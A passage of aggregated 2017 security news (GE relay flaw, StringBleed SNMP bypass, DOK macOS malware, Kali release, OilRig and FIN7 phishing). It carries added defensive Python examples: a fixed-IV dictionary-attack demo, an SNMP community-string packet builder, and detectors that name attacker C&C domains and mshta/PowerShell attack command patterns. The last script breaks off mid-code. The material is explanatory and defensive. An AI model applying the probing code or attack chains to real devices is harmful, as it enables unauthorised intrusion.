An attacker who can obtain the password — either from the front LCD panel or via Modbus commands — can hijack the affected device.
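The non-random IV mentioned above is worth seeing concretely. What follows is an added illustration, not GE's code, and not the relays' actual cipher (which is not public): a toy stream cipher built from an HMAC-SHA256 keystream stands in for it, and the device key, the fixed IV and the candidate-password list are all constructed. It shows the property every IV-based mode has when the IV never changes: equal passwords give equal ciphertexts, so an attacker who can run the same encryption routine (assumed here, for example through a key shared across a product line) precomputes a dictionary once and looks stored blobs up in it, and even without the key can tell that two devices share a password. A fresh random IV per encryption defeats both.

```python
"""Deterministic (fixed-IV) password encryption versus a fresh random IV.

Added illustration, not GE code: the relays' real cipher is not public, so a
toy stream cipher built from an HMAC-SHA256 keystream stands in for it. The
device key, the fixed IV and the candidate-password list are constructed.
"""
import hashlib
import hmac
import os
from typing import Callable, Optional

DEVICE_KEY = b"constructed-device-key"   # assumption: one key shared by a product line
FIXED_IV = bytes(16)                     # the weak setting: the IV never changes
CANDIDATES = ["password", "admin", "relay1", "multilin", "operator"]  # constructed list


def keystream(key: bytes, iv: bytes, length: int) -> bytes:
    """Keystream blocks = HMAC(key, iv || counter). The IV is the only
    per-message input, so a fixed IV means a fixed keystream."""
    out = b""
    counter = 0
    while len(out) < length:
        out += hmac.new(key, iv + counter.to_bytes(4, "big"), hashlib.sha256).digest()
        counter += 1
    return out[:length]


def encrypt(key: bytes, iv: bytes, plaintext: bytes) -> bytes:
    """Return iv || (plaintext XOR keystream), the layout of a CTR-style mode."""
    ks = keystream(key, iv, len(plaintext))
    return iv + bytes(p ^ k for p, k in zip(plaintext, ks))


def encrypt_fixed_iv(password: str) -> bytes:
    return encrypt(DEVICE_KEY, FIXED_IV, password.encode())


def encrypt_random_iv(password: str) -> bytes:
    return encrypt(DEVICE_KEY, os.urandom(16), password.encode())


def dictionary_attack(stored: bytes, enc: Callable[[str], bytes]) -> Optional[str]:
    """Precompute ciphertexts of common passwords with the same routine and
    look the stored blob up. Succeeds only when encryption is deterministic."""
    table = {enc(p): p for p in CANDIDATES}
    return table.get(stored)


def same_password(blob_a: bytes, blob_b: bytes) -> bool:
    """Key-free leak: with a fixed IV, identical blobs mean identical passwords."""
    return blob_a == blob_b


if __name__ == "__main__":
    stored = encrypt_fixed_iv("multilin")
    print("fixed IV  ->", dictionary_attack(stored, encrypt_fixed_iv))    # multilin
    stored = encrypt_random_iv("multilin")
    print("random IV ->", dictionary_attack(stored, encrypt_random_iv))   # None
```

The table lookup is the whole attack: with a fixed IV the work is done once, offline, for every device of that model; with a random IV each stored blob needs its own effort, and the keyless equality check between two devices also stops working.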
ICS-CERT reported that the flaw affects the 750 and 760 Feeder Protection Systems, 369 and 469 Motor Protection Relays, 745 Transformer Protection Relays, and 489 Generator Protection Relays.
GE has already released firmware updates that address the vulnerability for most of these devices, except for 369 Motor Protection Relays, for which patches are expected to become available in June.
The vendor has also advised users to follow physical and network security best practices to prevent exploitation of the flaw, including keeping the devices in a secure environment, removing passwords for decommissioned devices, implementing network segmentation, and monitoring the network for malicious activity.
GE has released an advisory, but it’s only available to customers. The company told SecurityWeek that the affected products are “a limited family of legacy GE products that were developed in the 1990s before current industry expectations for security.” GE said it was not aware of any incidents where the security hole had been exploited.
While the recent disruptions to Ukraine’s energy supply have clearly demonstrated that attacks on the power grid are a reality, it’s not uncommon for cybersecurity researchers to exaggerate the impact of their findings. It remains to be seen exactly how easily this flaw can be exploited after more information is made available.
StringBleed SNMP Authentication Bypass affects numerous devices online
28.4.2017 securityaffairs Vulnerability
Security researchers discovered an SNMP flaw dubbed StringBleed that affects several models of Internet-connected devices.
A Simple Network Management Protocol (SNMP) authentication bypass affects several IoT devices; attackers could exploit the issue by simply sending random values in specific requests.
The problem, dubbed StringBleed and tracked as CVE-2017-5135, was reported by security researchers Ezequiel Fernandez and Bertin Bervis.
The SNMP protocol supports three methods for authenticating the client and its requests on remote SNMP devices; two of them are affected by the authentication bypass issue.
The StringBleed issue resides in the way the SNMP agent running on different IoT devices handles a human-readable string datatype value called the “community string”, which SNMP versions 1 and 2 use.
“We know there are 3 ways to authenticate the client and requests in the remote SNMP device. SNMP version 1 & 2 use a human-readable string datatype value called “community string” (usually public or private); in SNMP version 3 you have the option to use a user, password and authentication methods,” explained the researchers.
The researchers used a simple Python script to build an “snmpget” request for the sysDescr OID, then started scanning the Internet for devices that would respond to it. They were looking for the sysDescr OID information returned by devices in response to requests using test strings like ‘admin’, ‘root’, and ‘user’.
The researchers expected to retrieve the sysDescr OID information successfully only when the test string value (‘admin’, ‘root’, ‘user’, etc.) was the same as the one stored in the SNMP agent for authentication.
“We wrote a simple python script from scratch using sockets in order to build the “snmpget” request, in the request we used the sysDescr OID, if the string value we are testing (admin, root etc etc) is the same stored in the SNMP agent for authentication, we are going to retrieve the sysDescr OID information successfully, is like a kind of “brute force”. After some days of scanning we noticed something weird, some devices/fingerprints were always responding no matter which value we used, so what’s going on here???
As I mentioned before, the SNMP version 1 & 2 authentication should only accept the value stored in the SNMP agent authentication mechanism, but the behavior based in our results is not accurate like the statement explained previously,” the researchers added.
The StringBleed vulnerability is an Incorrect Access Control issue, remote attackers could exploit the issue to execute code on the vulnerable devices and gain “full read/write remote permissions using any string/integer value.”
“In a few words, we discovered the following: you can use any value string or integer in order to authenticate the SNMP agent successfully in some specific devices, but the worst thing here is: you have full read/write remote permissions using any string/integer value,” said the researchers.
The results of the Internet scan were disconcerting: an attacker could use any string or integer value to authenticate to the SNMP agent on the flawed devices.
The experts discovered the bug by testing the attack on the CISCO DPC3928SL wireless residential gateway, a product line now owned by Technicolor.
The company confirmed the presence of the StringBleed bug on the device but clarified that it was only a “control misconfiguration issue” and that it was isolated to a single Internet Service Provider (ISP).
According to the experts, the issue is widespread and hackers could easily target vulnerable devices exposed on the Internet.
One of the researchers revealed in a discussion on Reddit that 78 device models had been found vulnerable to the StringBleed flaw to date.
Stay tuned: the number of models could rapidly increase.
New MacOS Malware, Signed With Legit Apple ID, Found Spying On HTTPS Traffic
28.4.2017 thehackernews Apple
Many people believe that they are much less likely to be bothered by malware if they use a Mac computer, but is it really true? Unfortunately, No.
According to the McAfee Labs, malware attacks on Apple's Mac computers were up 744% in 2016, and its researchers have discovered nearly 460,000 Mac malware samples, which is still just a small part of overall Mac malware out in the wild.
Today, the malware research team at Check Point has discovered a new piece of fully undetectable Mac malware which, according to them, affects all versions of Mac OS X, has zero detections on VirusTotal and is "signed with a valid developer certificate (authenticated by Apple)."
Dubbed DOK, the malware is being distributed via a coordinated email phishing campaign and, according to the researchers, is the first major scale malware to target macOS users.
The malware has been designed to gain administrative privileges and install a new root certificate on the target system, which allows attackers to intercept and gain complete access to all victim communication, including SSL encrypted traffic.
Almost three months ago, Malwarebytes researchers also discovered a rare piece of Mac-based espionage malware, dubbed Fruitfly, that was used to spy on biomedical research center computers and had remained undetected for years.
Here's How the DOK Malware Works:
The malware is distributed via a phishing email masquerading as a message about supposed inconsistencies in the recipient's tax returns, tricking the victims into running an attached malicious .zip file that contains the malware.
Since the malware author is using a valid developer certificate signed by Apple, the malware easily bypasses Gatekeeper -- the built-in security feature of the macOS operating system. Interestingly, the DOK malware also goes undetected by almost all antivirus products.
Once installed, the malware copies itself to the /Users/Shared/ folder and then adds itself as a login item ("loginItem") to make itself persistent, so that it executes automatically every time the system reboots, until it finishes installing its payload.
The malware then creates a window on top of all other windows, displaying a message claiming that a security issue has been identified in the operating system and an update is available, for which the user has to enter his/her password.
Once the victim installs the "update", the malware gains administrator privileges on the victim's machine and changes the system's network settings so that all outgoing connections pass through a proxy.
According to CheckPoint researchers, "using those privileges, the malware will then install brew, a package manager for OS X, which will be used to install additional tools – TOR and SOCAT."
DOK Deletes itself after Setting up Attacker's Proxy
The malware then installs a new root certificate in the infected Mac, which allows the attacker to intercept the victim’s traffic using a man-in-the-middle (MiTM) attack.
"As a result of all of the above actions, when attempting to surf the web, the user’s web browser will first ask the attacker web page on TOR for proxy settings," the researchers say.
"The user traffic is then redirected through a proxy controlled by the attacker, who carries out a Man-In-the-Middle attack and impersonates the various sites the user attempts to surf. The attacker is free to read the victim's traffic and tamper with it in any way they please."
According to researchers, almost no antivirus has updated its signature database to detect the DOK OS X malware, as the malware deletes itself once it modifies proxy settings on the target machines for interceptions.
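Because the agent removes itself, what remains to find on a machine are the two changes the write-up describes: a proxy auto-configuration (PAC) URL forced onto a network service, and a root certificate added to the keychain. The script below is an added example for defenders, not Check Point's tooling. It parses the text that `networksetup -getautoproxyurl <service>` and `security find-certificate -a -p <keychain>` print, compares certificate fingerprints with a baseline taken from a known-good Mac, and runs offline on constructed samples in that format (the PAC URL, the DER blobs and the baseline fingerprint are placeholders; the `live_autoproxy_outputs` helper collects real output only on macOS).

```python
"""Offline checks for the two persistent changes the DOK write-up describes:
a forced proxy auto-config (PAC) URL on a network service and a root
certificate added to the System keychain.

Added example, not Check Point's tooling. It parses the text printed by
`networksetup -getautoproxyurl <service>` and
`security find-certificate -a -p <keychain>`; the samples below are
constructed in that format, so the code runs without a Mac.
"""
import base64
import hashlib
import re
import sys
from typing import Dict, List, Set


def parse_autoproxy(outputs: Dict[str, str]) -> List[Dict[str, str]]:
    """outputs: service name -> `networksetup -getautoproxyurl` text.
    Returns the services whose PAC setting is enabled, with the URL."""
    hits = []
    for service, text in outputs.items():
        url = re.search(r"^URL:\s*(.+)$", text, re.M)
        enabled = re.search(r"^Enabled:\s*(Yes|No)", text, re.M)
        if url and enabled and enabled.group(1) == "Yes":
            hits.append({"service": service, "pac_url": url.group(1).strip()})
    return hits


def pem_fingerprints(pem_text: str) -> List[str]:
    """SHA-256 over the DER bytes of each PEM certificate block."""
    blocks = re.findall(r"-----BEGIN CERTIFICATE-----(.*?)-----END CERTIFICATE-----",
                        pem_text, re.S)
    return [hashlib.sha256(base64.b64decode("".join(b.split()))).hexdigest()
            for b in blocks]


def unexpected_roots(pem_text: str, baseline: Set[str]) -> List[str]:
    """Fingerprints in the keychain dump that the known-good baseline lacks."""
    return [fp for fp in pem_fingerprints(pem_text) if fp not in baseline]


def _pem(der: bytes) -> str:
    b64 = base64.b64encode(der).decode()
    body = "\n".join(b64[i:i + 64] for i in range(0, len(b64), 64))
    return f"-----BEGIN CERTIFICATE-----\n{body}\n-----END CERTIFICATE-----\n"


# Constructed samples: placeholder blobs of the right shape, not real certificates.
KNOWN_DER = b"constructed placeholder DER: vendor root CA"
ROGUE_DER = b"constructed placeholder DER: attacker MITM root"
ROGUE_FP = hashlib.sha256(ROGUE_DER).hexdigest()
BASELINE = {hashlib.sha256(KNOWN_DER).hexdigest()}
SAMPLE_KEYCHAIN = _pem(KNOWN_DER) + _pem(ROGUE_DER)
SAMPLE_AUTOPROXY = {                       # constructed networksetup output
    "Wi-Fi": "URL: http://127.0.0.1:5555/attacker.pac\nEnabled: Yes\n",
    "Ethernet": "URL: (null)\nEnabled: No\n",
}


def live_autoproxy_outputs() -> Dict[str, str]:
    """macOS only: collect the real outputs for every network service."""
    import subprocess
    listing = subprocess.run(["networksetup", "-listallnetworkservices"],
                             capture_output=True, text=True).stdout
    services = [s.lstrip("*") for s in listing.splitlines()[1:] if s.strip()]
    return {s: subprocess.run(["networksetup", "-getautoproxyurl", s],
                              capture_output=True, text=True).stdout for s in services}


if __name__ == "__main__":
    outputs = live_autoproxy_outputs() if sys.platform == "darwin" else SAMPLE_AUTOPROXY
    print("PAC enabled on:", parse_autoproxy(outputs))
    print("roots not in baseline:", unexpected_roots(SAMPLE_KEYCHAIN, BASELINE))
```

A PAC URL that was never set by the organisation, together with a root certificate absent from the baseline, is exactly the combination that lets a proxy impersonate HTTPS sites without browser warnings; either finding on its own is worth a look.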
Apple can resolve this issue just by revoking the developer certificate being abused by the malware author.
Meanwhile, users are advised to avoid clicking links contained in messages or emails from untrusted sources and to always pay extra attention before providing their root password.
Kali Linux 2017.1 has arrived, with more power for password cracking using cloud GPUs
28.4.2017 securityaffairs Safety
The Kali Linux 2017.1 rolling release has been announced; the popular distro comes with a set of significant updates and features.
The popular Kali Linux distribution has a new weapon in its hacking arsenal: it can use cloud GPUs for password cracking.
Kali Linux is the most popular distribution in the hacking community; it is a Debian-based distro that includes numerous hacking and forensics tools.
This week, the Kali development team included new images optimized for GPU-equipped instances in Azure and Amazon Web Services. The images improve the password-cracking abilities of the Kali Linux distro, giving it more power for brute-force attacks by exploiting the GPUs' computational power.
“Due to the increasing popularity of using cloud-based instances for password cracking, we decided to focus our efforts into streamlining Kali’s approach. We noticed that Amazon’s AWS P2-Series and Microsoft’s Azure NC-Series allow pass-through GPU support so we made corresponding AWS and Azure images of Kali that support CUDA GPU cracking out of the box. You can check out our Cracking in the Cloud with CUDA GPUs post we released a few weeks back for more information.” states the official announcement.
Now, if you want to test your passwords against brute-force attacks, you can download the GPU-enhanced images and run them in cloud services; the bad news is that black hats also have a new powerful weapon in their hands.
The new Kali Linux, version 2017.1, also adds support for Realtek's RTL8812AU wireless chipsets, a very useful feature because these chipsets are used by major modem makers like Belkin, D-Link, and TP-Link.
“A while back, we received a feature request asking for the inclusion of drivers for RTL8812AU wireless chipsets. These drivers are not part of the standard Linux kernel, and have been modified to allow for injection. Why is this a big deal? This chipset supports 802.11 AC, making this one of the first drivers to bring injection-related wireless attacks to this standard, and with companies such as ALFA making the AWUS036ACH wireless cards, we expect this card to be an arsenal favorite.” continues the announcement.
The driver can be installed using the following commands:
apt-get update
apt install realtek-rtl88xxau-dkms
Reading the Kali Linux bug tracker list, we can also notice new support for the OpenVAS 9 vulnerability scanner.
Enjoy it!
The massive attack against Israel was allegedly launched by the Iranian OilRig APT group
28.4.2017 securityaffairs APT
According to experts at the security firm Morphisec, the massive attack against Israeli targets was powered by the OilRig APT group.
Yesterday the Israeli Cyber Defense Authority announced it had thwarted a major cyberattack against 120 targets, just days after harsh criticism of a new cyber defense bill.
At first, the authorities blamed an unnamed foreign state for the massive cyber espionage campaign against major Israeli institutions and government officials; now the Authority blames Iranian state-sponsored hackers for the cyber attack.
The Israeli experts believe the attack was launched by the OilRig APT group (aka Helix Kitten, NewsBeef), an Iran-linked APT that has been around since at least 2015.
According to the Israeli Cyber Defense Authority, hackers targeted some 250 individuals between April 19 and 24 in various sectors, including government agencies, high-tech companies, medical organizations, and educational institutions, among them the renowned Ben-Gurion University.
Hackers also targeted experts at the prestigious Ben-Gurion University, where researchers conduct advanced research. The threat actors leveraged stolen email accounts from Ben-Gurion to deliver malware to victims.
“From April 19-24, 2017, a politically-motivated, targeted campaign was carried out against numerous Israeli organizations. Morphisec researchers began investigating the attacks on April 24 and continue to uncover more details. Initial reports of the attacks, published April 26 (in Hebrew) by the Israel National Cyber Event Readiness Team (CERT-IL) and The Marker, confirm that the attack was delivered through compromised email accounts at Ben-Gurion University and sent to multiple targets across Israel. Ironically, Ben-Gurion University is home to Israel’s Cyber Security Research Center.” reads the analysis shared by Morphisec. “Investigators put the origin of the attack as Iranian; Morphisec’s research supports this conclusion and attributes the attacks to the same infamous hacker group responsible for the OilRig malware campaigns.“
Hackers used weaponized Word documents that trigger the recently patched Microsoft RCE vulnerability tracked as CVE-2017-0199.
The exploitation of this specific flaw demonstrates the technical evolution of the OilRig APT group. The attack does not require the user interaction that macro-based attacks do; the weaponized document carries the exploit as an embedded link that pulls in an HTML Application (HTA) executable.
“The attack was delivered via Microsoft Word documents that exploited a former zero-day vulnerability in Word, CVE-2017-0199, by actually reusing an existing PoC that have been published immediately after the patch release. Microsoft released the patch for the vulnerability on April 11 but many organizations have not yet deployed the update. The delivered documents installed a fileless variant of the Helminth Trojan agent.” continues the analysis.
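The delivery pattern described here (an RTF whose embedded OLE object is a link that Word refreshes on open, pointing at a remote HTA) can be triaged statically before a document ever reaches a user. The script below is an added example for defenders, not Morphisec's or the attackers' code: it decodes the hex `\objdata` blobs of an RTF, looks for URLs in ASCII or UTF-16LE inside them, and combines that with the `\objautlink` and `\objupdate` control words. The sample RTF is constructed and is not a working document or exploit; its object data is only a placeholder URL padded with filler bytes.

```python
"""Static triage for the CVE-2017-0199 delivery pattern: an RTF whose OLE
object is a link (\objautlink) refreshed on open (\objupdate) and whose
\objdata hex blob carries a remote URL, typically ending in .hta.

Added example for defenders, not Morphisec's or the attackers' code. The
sample below is constructed: its object data is a placeholder URL padded
with filler bytes, not a valid OLE stream.
"""
import re
from typing import Dict, List

CONTROLS = re.compile(rb"\\(objautlink|objupdate|objemb|object)\b")
OBJDATA = re.compile(rb"\\objdata\b([^{}]*)")
URL = re.compile(rb"https?://[\x21-\x7e]+", re.I)


def objdata_blobs(rtf: bytes) -> List[bytes]:
    """Decode every \\objdata hex run (up to the closing brace) into bytes."""
    blobs = []
    for m in OBJDATA.finditer(rtf):
        hexchars = re.sub(rb"[^0-9a-fA-F]", b"", m.group(1))
        if len(hexchars) % 2:                 # tolerate a truncated final nibble
            hexchars = hexchars[:-1]
        blobs.append(bytes.fromhex(hexchars.decode()))
    return blobs


def find_urls(blob: bytes) -> List[str]:
    """URLs stored as ASCII or as UTF-16LE (both alignments) in object data."""
    found = {u.decode("ascii", "replace") for u in URL.findall(blob)}
    for start in (0, 1):                      # UTF-16LE may begin at an odd offset
        wide = blob[start:].decode("utf-16-le", "ignore").encode("ascii", "ignore")
        found.update(u.decode() for u in URL.findall(wide))
    return sorted(found)


def triage_rtf(rtf: bytes) -> Dict[str, object]:
    """Flag a linked, auto-updating OLE object whose data names a remote URL."""
    controls = {c.decode() for c in CONTROLS.findall(rtf)}
    urls = sorted({u for blob in objdata_blobs(rtf) for u in find_urls(blob)})
    return {
        "controls": sorted(controls),
        "urls": urls,
        "remote_hta": any(u.lower().endswith(".hta") for u in urls),
        "suspicious": {"objautlink", "objupdate"} <= controls and bool(urls),
    }


# Constructed samples. The "object data" is just a UTF-16LE placeholder URL
# with filler bytes around it; there is no real OLE stream here.
_LINK = b"\x01\x05\x00\x00" + bytes(8) + "http://example.invalid/update.hta".encode("utf-16-le") + bytes(2)
SAMPLE_RTF = (
    b"{\\rtf1\\ansi Quarterly report\\par\n"
    b"{\\object\\objautlink\\objupdate\\objw100\\objh100{\\*\\objclass Word.Document.8}"
    b"{\\*\\objdata " + _LINK.hex().encode() + b"}{\\result{\\pict}}}}"
)
BENIGN_RTF = b"{\\rtf1\\ansi Hello\\par {\\object\\objemb{\\*\\objdata 0105000002000000}{\\result}}}"

if __name__ == "__main__":
    print(triage_rtf(SAMPLE_RTF))
    print(triage_rtf(BENIGN_RTF))
```

Treat `suspicious` as a triage signal, not a verdict: legitimate documents can link to objects, but an auto-updating link whose target is an HTTP URL ending in `.hta` has no normal business use and is worth quarantining for analysis.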
Experts at Morphisec discovered that hackers used a customized version of the open-source Mimikatz tool to gain access to user credentials in the Windows Local Security Authority Subsystem Service.
“Morphisec identified few more samples of communication with different other C&C servers (“alenupdate[.]info” and “maralen[.]tk”) in which a more advanced customized version of Mimikatz has been sent to specific users and additional agent have been installed in “C:\Program Files (x86)\Microsoft Idle\” directory:” states Morphisec.
Earlier this year the OilRig APT was involved in a string of cyber attacks that targeted several Israeli organizations, including IT vendors, the national postal service, and financial institutions.
Security experts from ClearSky discovered that the Iranian hackers set up a fake Juniper Networks VPN portal and used compromised email accounts from IT vendors to lure victims to it. According to ClearSky, OilRig APT leveraged digitally signed malware and fake University of Oxford domains in its campaign.
SNMP Authentication Bypass Plagues Numerous Devices
28.4.2017 securityweek Vulnerability
The Simple Network Management Protocol (SNMP) embedded in some Internet connected devices allows an attacker to bypass authentication by simply sending random values in specific requests, security researchers have discovered.
SNMP is a popular protocol for network management that features support for three ways to authenticate the client and requests on remote SNMP devices. The first two of these are vulnerable to an authentication bypass if random values are sent in requests, security researchers Ezequiel Fernandez (Argentina) and Bertin Bervis (Costa Rica) argue.
The issue, the researchers say, resides in the manner in which the SNMP agent in different devices (usually cable modems) handles a human-readable string datatype value called “community string” that SNMP version 1 and 2 use.
Called StringBleed and tracked as CVE-2017-5135, the vulnerability is classified as Incorrect Access Control and could allow an attacker to execute code remotely on the vulnerable device. Successful exploitation would provide them with “full read/write remote permissions using any string/integer value,” the researchers argue.
With the help of a Python script meant to build an “snmpget” request for the sysDescr OID, the researchers started searching the Internet for devices that would respond to the request. The researchers expected to retrieve the sysDescr OID information successfully only when the test string value (admin, root, user, etc.) was the same as the one stored in the SNMP agent for authentication.
The script was supposedly going to work as a type of brute force, the researchers say, but the results were surprising, as some of the discovered devices would respond to the request regardless of the used value.
“SNMP version 1 and 2 authentication should only accept the value stored in the SNMP agent authentication mechanism,” the researchers note. However, their testing revealed that an attacker could use any value string or integer to authenticate the SNMP agent successfully on specific device types.
The bug was initially discovered on the CISCO DPC3928SL wireless residential gateway, which is now owned by Technicolor, and which confirmed the bug, but said it was only a “control misconfiguration issue” and that it was isolated to a single Internet Service Provider (ISP).
The researchers, however, claim that the manufacturer is at fault and that the issue is more widespread. According to them, attackers could easily execute code or leak passwords and other sensitive information from vulnerable devices pertaining to several vendors.
In a post on Reddit, one of the researchers revealed that 78 vulnerable models were found to date, and also said that continuous scans might reveal more of them.
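Both StringBleed articles above describe the same probe: an SNMP v1/v2c GetRequest for sysDescr whose community string should be rejected unless it matches the agent's configured value. The code below is an added example, not the researchers' script: it encodes and decodes that message with the BER rules SNMP uses (so the packet layout is visible byte by byte) but sends nothing, and its `audit` function runs over constructed captured packets to flag two things a defender wants to see in traffic to their own agents: one source trying several non-allowlisted community strings, and an agent that answered such a request, which is the StringBleed symptom. The IP addresses and community strings in the sample are constructed; the sample response reuses the request layout for brevity.

```python
"""SNMP v1/v2c GetRequest encoder/decoder plus a community-string audit.

Added example, not the researchers' script: it rebuilds the kind of
"snmpget sysDescr" message they describe but never sends it. The audit
runs over constructed packets and flags non-allowlisted community strings
and any agent that answered one (the StringBleed symptom).
"""
from typing import Dict, List, Set, Tuple

SYS_DESCR_OID = "1.3.6.1.2.1.1.1.0"
TAG_SEQUENCE, TAG_INTEGER, TAG_OCTET, TAG_NULL, TAG_OID = 0x30, 0x02, 0x04, 0x05, 0x06
TAG_GET_REQUEST, TAG_GET_RESPONSE = 0xA0, 0xA2


def _ber_len(n: int) -> bytes:
    """Short form below 128, otherwise 0x80|count followed by the length bytes."""
    if n < 0x80:
        return bytes([n])
    body = n.to_bytes((n.bit_length() + 7) // 8, "big")
    return bytes([0x80 | len(body)]) + body


def _tlv(tag: int, payload: bytes) -> bytes:
    return bytes([tag]) + _ber_len(len(payload)) + payload


def _int(v: int) -> bytes:
    return _tlv(TAG_INTEGER, v.to_bytes((v.bit_length() + 8) // 8, "big", signed=True))


def _oid(dotted: str) -> bytes:
    """First two arcs fold into one byte; later arcs are base-128 with a
    continuation bit."""
    arcs = [int(a) for a in dotted.strip(".").split(".")]
    out = bytearray([40 * arcs[0] + arcs[1]])
    for arc in arcs[2:]:
        chunk = bytearray([arc & 0x7F])
        arc >>= 7
        while arc:
            chunk.insert(0, 0x80 | (arc & 0x7F))
            arc >>= 7
        out += chunk
    return _tlv(TAG_OID, bytes(out))


def build_get(community: str, oid: str = SYS_DESCR_OID, request_id: int = 1,
              version: int = 1, pdu_tag: int = TAG_GET_REQUEST) -> bytes:
    """version 0 = SNMPv1, 1 = SNMPv2c. pdu_tag 0xA2 builds a GetResponse."""
    varbind = _tlv(TAG_SEQUENCE, _oid(oid) + _tlv(TAG_NULL, b""))
    pdu = _tlv(pdu_tag, _int(request_id) + _int(0) + _int(0) + _tlv(TAG_SEQUENCE, varbind))
    return _tlv(TAG_SEQUENCE, _int(version) + _tlv(TAG_OCTET, community.encode()) + pdu)


def _parse_tlv(buf: bytes, pos: int) -> Tuple[int, bytes, int]:
    tag, length = buf[pos], buf[pos + 1]
    pos += 2
    if length & 0x80:
        n = length & 0x7F
        length = int.from_bytes(buf[pos:pos + n], "big")
        pos += n
    return tag, buf[pos:pos + length], pos + length


def parse_message(buf: bytes) -> Dict[str, object]:
    """Version, community string and PDU type of a v1/v2c message."""
    tag, body, _ = _parse_tlv(buf, 0)
    if tag != TAG_SEQUENCE:
        raise ValueError("not an SNMP message")
    _, ver, pos = _parse_tlv(body, 0)
    _, community, pos = _parse_tlv(body, pos)
    pdu_tag, _, _ = _parse_tlv(body, pos)
    return {"version": int.from_bytes(ver, "big", signed=True),
            "community": community.decode("latin-1"), "pdu_tag": pdu_tag}


def audit(captured: List[Tuple[str, str, bytes]], allowed: Set[str]) -> Dict[str, object]:
    """captured: (src_ip, dst_ip, packet). Reports non-allowlisted community
    strings per source and agents that replied to such a request."""
    bad_requests: Dict[str, Set[str]] = {}
    answered: Set[str] = set()
    for src, _dst, pkt in captured:
        msg = parse_message(pkt)
        if msg["community"] in allowed:
            continue
        if msg["pdu_tag"] == TAG_GET_REQUEST:
            bad_requests.setdefault(src, set()).add(msg["community"])
        elif msg["pdu_tag"] == TAG_GET_RESPONSE:
            answered.add(src)                 # the agent at src accepted a bad string
    return {"bad_requests": {k: sorted(v) for k, v in bad_requests.items()},
            "agents_answering_bad_community": sorted(answered)}


# Constructed traffic: one source tries three guesses; the agent answers one.
SAMPLE = [
    ("198.51.100.7", "192.0.2.10", build_get("admin", request_id=1)),
    ("198.51.100.7", "192.0.2.10", build_get("root", request_id=2)),
    ("198.51.100.7", "192.0.2.10", build_get("user", request_id=3)),
    ("192.0.2.10", "198.51.100.7", build_get("user", request_id=3, pdu_tag=TAG_GET_RESPONSE)),
    ("192.0.2.99", "192.0.2.10", build_get("public", request_id=4)),
]

if __name__ == "__main__":
    print(build_get("public").hex())
    print(audit(SAMPLE, {"public"}))
```

Run against a real capture, the `agents_answering_bad_community` list is the one that matters: an agent replying to a community string you never configured is either misconfigured or affected by this bug, and belongs behind a management ACL either way.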
FIN7 Hackers Change Phishing Techniques
28.4.2017 securityweek Phishing
A recently uncovered threat group referred to as FIN7 has adopted new phishing techniques and is now using hidden shortcut files (LNK files) to compromise targets, FireEye security researchers reveal.
The financially-motivated threat group has been active since late 2015 and was recently found to have been targeting personnel involved with United States Securities and Exchange Commission (SEC) filings at various organizations with a new PowerShell backdoor dubbed POWERSOURCE.
While some security firms refer to the operation as the “Carbanak Group,” FireEye says that not all CARBANAK backdoor activity can be attributed to FIN7. Interestingly, the group’s recent fileless attacks were said last month to have been launched from an attack framework used in various other seemingly unrelated attacks as well.
In the recently observed campaign, FIN7 was no longer using malicious Microsoft Office macros to evade detection, but switched to hidden shortcut files (LNK files) as the initial infection vector, while using the VBScript functionality launched by mshta.exe to infect the victim, FireEye reveals.
The campaign featured spear phishing emails that contained malicious DOCX or RTF files, each being a different variant of the same LNK file and VBScript technique. The group targeted various locations of large restaurant chains, hospitality, and financial service organizations with emails themed as complaints, catering orders, or resumes. On top of that, the group was also calling the targets to make sure they received the email.
The DOCX and RTF files attempt to convince the user to double-click included images. When that happens, the hidden embedded malicious LNK file in the document launches “mshta.exe” with a specific argument. The script in the argument combines all text box contents in the document, executes them, and creates a scheduled task for persistence.
“Overall, this is a more effective phishing tactic since the malicious content is embedded in the document content rather than packaged in the OLE object. By requiring this unique interaction – double-clicking on the image and clicking the “Open” button in the security warning popup – the phishing lure attempts to evade dynamic detection as many sandboxes are not configured to simulate that specific user action,” the researchers note.
A multilayer obfuscated PowerShell script is dropped and launched, which in turn executes shellcode for a Cobalt Strike stager. The shellcode retrieves an additional payload by connecting to a specific command and control (C&C) server using DNS, the researchers discovered. If a successful reply is received from the C&C, the PowerShell executes the embedded Cobalt Strike.
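The chain just described leaves a distinctive process tree: an Office application, mshta.exe with an inline `vbscript:` argument instead of an .hta path, and then schtasks.exe and powershell.exe as children of mshta.exe. The script below is an added example of that detection logic, not FireEye's content. Its events are constructed in the shape of Sysmon process-creation records (pid, parent pid, image, command line); the command lines are abbreviated placeholders rather than the real FIN7 arguments, and `javascript:` is included alongside `vbscript:` as the obvious sibling of the page's pattern.

```python
"""Process-tree detection for the LNK -> mshta.exe -> scheduled task /
PowerShell chain. Added example, not FireEye's detection content; the
events are constructed in Sysmon process-creation shape with placeholder
command lines.
"""
from typing import Dict, List, Tuple

OFFICE_APPS = {"winword.exe", "excel.exe", "outlook.exe"}
INLINE_SCRIPT = ("vbscript:", "javascript:")      # mshta normally opens an .hta path
CHILDREN_OF_INTEREST = {"schtasks.exe", "powershell.exe"}

# Constructed events: pid, parent pid, image name, command line.
EVENTS = [
    {"pid": 100, "ppid": 1,   "image": "explorer.exe",   "cmd": "explorer.exe"},
    {"pid": 200, "ppid": 100, "image": "WINWORD.EXE",    "cmd": '"WINWORD.EXE" /n complaint.docx'},
    {"pid": 300, "ppid": 200, "image": "mshta.exe",      "cmd": 'mshta.exe vbscript:Execute("<document text boxes>")'},
    {"pid": 400, "ppid": 300, "image": "schtasks.exe",   "cmd": "schtasks /Create /SC MINUTE /TN <task> /TR <payload>"},
    {"pid": 500, "ppid": 300, "image": "powershell.exe", "cmd": "powershell.exe -w hidden -enc <blob>"},
    {"pid": 600, "ppid": 100, "image": "mshta.exe",      "cmd": r"mshta.exe C:\Program Files\Vendor\help.hta"},
]


def ancestors(by_pid: Dict[int, dict], pid: int) -> List[str]:
    """Lower-cased image names from the process itself up to the root."""
    chain, seen = [], set()
    while pid in by_pid and pid not in seen:
        seen.add(pid)
        chain.append(by_pid[pid]["image"].lower())
        pid = by_pid[pid]["ppid"]
    return chain


def detect(events: List[dict]) -> List[Tuple[int, str, str]]:
    """Return (pid, rule, severity) for events matching the chain."""
    by_pid = {e["pid"]: e for e in events}
    alerts = []
    for e in events:
        image, cmd = e["image"].lower(), e["cmd"].lower()
        chain = ancestors(by_pid, e["pid"])
        parents = chain[1:]
        if image == "mshta.exe" and any(p in cmd for p in INLINE_SCRIPT):
            # Inline script in mshta is rare by itself; from Office it is the lure.
            severity = "high" if any(p in OFFICE_APPS for p in parents) else "medium"
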